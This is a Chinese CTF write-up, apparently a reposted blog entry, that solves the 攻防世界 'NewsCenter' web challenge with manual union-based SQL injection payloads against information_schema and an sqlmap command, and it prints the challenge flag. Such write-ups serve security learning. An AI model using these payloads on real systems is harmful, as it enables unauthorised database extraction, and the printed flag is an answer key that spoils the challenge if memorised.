当前位置: 首页 > news >正文

攻防世界-Web-NewsCenter

news 2025/10/3 12:09:05

知识点

1.手工sql注入

2.sqlmap工具注入

步骤

方法一:手工

1.打开网站,发现查询输入框,不输入回车,有七条数据,输入1有两条数据,判断回查询数据库。

2.判断是否存在sql注入

输入1',页面报错,可能存在sql注入。

3.判断类型

输入1 and 1=1,页面无回显,1 and 1=2,页面无回显,判断不是数字型。

                     输入' and 1=1 #,页面有回显,' and 1=2 #,页面无回显,判断为字符型。

                这里输入1' and 1=1 #和1' and 1=2 #来判断是否为字符不知道为什么都不回显(有知道的可以评论)  

4.判断字段数

' order by 3 #

超过3时会报错,所以字段数为3

5.查看回显地方

1' union select 1,2,3 #

6.查询数据库

1' union select 1,database(),3 #

7.查询表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='news' #

8.查询字段

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table' #

9.查询数据

1' union select 1,2,group_concat(fl4g) from secret_table #

方法二:sqlmap

因为是post请求,所以先包,然后保存

python sqlmap.py -r 1.txt -D news -T secret_table -C fl4g --dump

flag:QCTF{sq1_inJec7ion_ezzz}

http://www.dtcms.com/a/435824.html

相关文章:

  • 濮阳住房建设厅网站网站建设视频上传
  • 网站建设 微信微博外包上线了 建立网站
  • 【多线程二】——线程安全
  • 网站建设属什么费用建网站莱阳哪家强?
  • 织梦建站系统教程网上房地产备案查询
  • 企业网站视频栏目建设方案汽车网站建设预算
  • 《嵌入式 – GD32开发实战指南(RISC-V版本)》第6章 按键
  • 《嵌入式 – GD32开发实战指南(RISC-V版本)》第4章 GD32VF103启动流程详解
  • 公司静态网站模板东乌珠穆沁旗网站建设
  • 网站怎么在微博推广个人网站 备案 攻略
  • 建设银行如何设置网站查询密码泰州网站建设策划
  • 基于django的电子商务网站开发山东城乡和住房建设厅官网
  • 无锡市网站搭建营销网站开发规划
  • 网站后台修改内容看不见了做移动端活动页面参考网站
  • 贵阳建立网站领动做的企业网站怎么样
  • VirtualBox 7.2.2安装踩坑记录
  • 重庆市工程建设信息西安seo盐城
  • 【Linux】Linux调试器----gdb/cgdb
  • 天津搜索引擎推广网站优化设计方案
  • 西安网站建设开发查派宜昌市住房和城乡建设局网站
  • 德州企业网站建设要素wordpress 纯代码 雪花
  • 柳州网站建设哪家好硬件开发是什么意思
  • linux学习笔记 (10) 进程的内存管理
  • Java学习笔记Day13
  • .net网站设计企业信息公示网站
  • 网站后台建设招聘中山专业网站制作
  • 怎么免费建设自己网站什么网站可以分享wordpress
  • 做影片的网站描述网络平台建设公司排名
  • 有阿里云主机管理平台如何自己做网站自己制作头像的网站 设计 动漫
  • 滨州的网站建设深圳推广软件十年乐云seo